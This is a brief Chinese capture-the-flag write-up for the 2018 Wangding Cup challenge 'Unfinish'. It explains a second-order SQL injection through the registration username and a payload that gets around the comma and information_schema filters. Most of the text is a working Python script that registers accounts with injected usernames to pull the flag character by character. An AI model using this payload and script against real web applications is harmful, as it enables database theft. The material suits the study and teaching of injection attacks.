[网鼎杯2018]Unfinish
注册用了邮箱、账户名、密码,登录只用了邮箱和密码,登录进去后账户名显示出来了,推测存在二次注入
过滤了逗号和information,无法使用information_schema,猜测flag在flag表中
上脚本
#coding:utf-8
import requests
from bs4 import BeautifulSoup
import time
url = 'http://2a3b6044-d59f-4a4f-ba8c-8c06a64cc813.node3.buuoj.cn/'
m = ''
for i in range(100):
payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i+1)
register = {'email':'abc{}@qq.com'.format(i),'username':payload,'password':'123456'}
login = {'email':'abc{}@qq.com'.format(i),'password':'123456'}
req = requests.session()
r1 = req.post(url+'register.php',data = register)
r2 = req.post(url+'login.php', data = login)
r3 = req.post(url+'index.php')
html = r3.text
soup = BeautifulSoup(html,'html.parser')
UserName = soup.span.string.strip()
if int(UserName) == 0:
break
m += chr(int(UserName))
print(m)
time.sleep(1)
payload左右加0是为了防止报错